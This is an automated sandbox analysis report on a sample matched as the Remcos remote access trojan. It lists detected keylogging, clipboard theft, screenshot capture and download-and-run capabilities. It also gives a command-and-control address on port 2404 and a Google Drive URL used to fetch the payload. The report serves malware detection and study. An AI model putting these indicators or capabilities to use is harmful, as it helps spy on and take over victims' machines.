Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_105389CB getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose,20_2_105389CB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_10535E90 _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread,20_2_10535E90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_10534B5D FindFirstFileW,20_2_10534B5D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_10543F1B FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose,20_2_10543F1B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_1053631C FindFirstFileW,FindNextFileW,FindClose,20_2_1053631C
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_00405B50 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,29_2_00405B50
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_02925CD4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,29_2_02925CD4
Contains functionality to query local drivesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00403B9A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch20_2_00403B9A

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 4x nop then mov eax, edi29_2_043F9168
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 4x nop then mov eax, edi29_2_043F9166
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 4x nop then test eax, 40000000h29_2_043F8B48
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 4x nop then or edx, 08h29_2_043F8B48

Networking:

barindex
Contains functionality to download and execute PE filesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_1053EC6F URLDownloadToFileW,ShellExecuteW,??3@YAXPAX@Z,20_2_1053EC6F
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.7:49711 -> 185.140.53.21:2404
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Contains functionality to download additional files from the internetShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00402139 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,20_2_00402139
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: doc-14-8g-docs.googleusercontent.com
Urls found in memory or binary dataShow sources
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1.crl0
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o10
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmpString found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-8g-docs.googleuse
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/#
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/1
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp, readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/docs/securesc/okjaf0d96k16o2ur6os401lotlk7qdd4/6nj4b82m
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/docs/secuu(
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/me
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/y
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmpString found in binary or memory: https://docs.google.com/
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmpString found in binary or memory: https://docs.google.com/nonceSigner?nonce=aihg3q2q9cv2s&continue=https://doc-14-8g-docs.googleuserco
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
Source: Htdrset.exe, 00000015.00000002.721028172.0000000004540000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/u/0/uc?id=1cz9sVIo7vuQlevGvVvv2eYYPIQVPcEnI&export=download
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/u/0/uc?id=1cz9sVIo7vuQlevGvVvv2eYYPIQVPcEnI&export=downloadq
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmpString found in binary or memory: https://pki.goog/repositorI
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to capture and log keystrokesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Esc] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Enter] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Tab] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Down] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Right] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Up] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Left] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [End] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F2] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F1] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 20_2_00405DA6
Contains functionality to register a low level keyboard hookShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_10536A11 SetWindowsHookExA 0000000D,004051AE,00000000,0000000020_2_10536A11
Contains functionality for read data from the clipboardShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai20_2_0040D1E8
Contains functionality to read the clipboard dataShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai20_2_0040D1E8
Contains functionality to record screenshotsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040F460 Sleep,CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,DeleteDC,DeleteDC,DeleteDC,DeleteObject,SelectObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,StretchBlt,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteObject,GetCursorInfo,GetIconInfo,DeleteObject,DeleteObject,DrawIcon,GetObjectA,DeleteDC,DeleteDC,DeleteDC,DeleteObject,LocalAlloc,GlobalAlloc,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GetDIBits,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GlobalFree,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,20_2_0040F460
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\Users\user\Desktop\readme.exeCode function: 0_2_00446CF0 GetKeyboardState,0_2_00446CF0
Potential key logger detected (key state polling based)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00405221 GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,20_2_00405221

E-Banking Fraud:

barindex
Yara detected Remcos RATShow sources
Source: Yara matchFile source: 00000022.00000002.720967567.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1021865759.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1018532568.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000021.00000002.714674742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000021.00000002.718308265.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000022.00000002.717758224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 4880, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 3944, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 2272, type: MEMORY
Source: Yara matchFile source: 34.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 33.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 34.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 34.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 34.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 33.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 33.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 33.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionalty to change the wallpaperShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00412EE3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,SystemParametersInfoW,20_2_00412EE3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_1054472B SystemParametersInfoW,20_2_1054472B

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000022.00000002.720967567.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000022.00000002.720967567.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000014.00000002.1021865759.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000014.00000002.1021865759.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000014.00000002.1018532568.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000014.00000002.1018532568.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000021.00000002.714674742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.714674742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000021.00000002.718308265.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.718308265.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000022.00000002.717758224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000022.00000002.717758224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
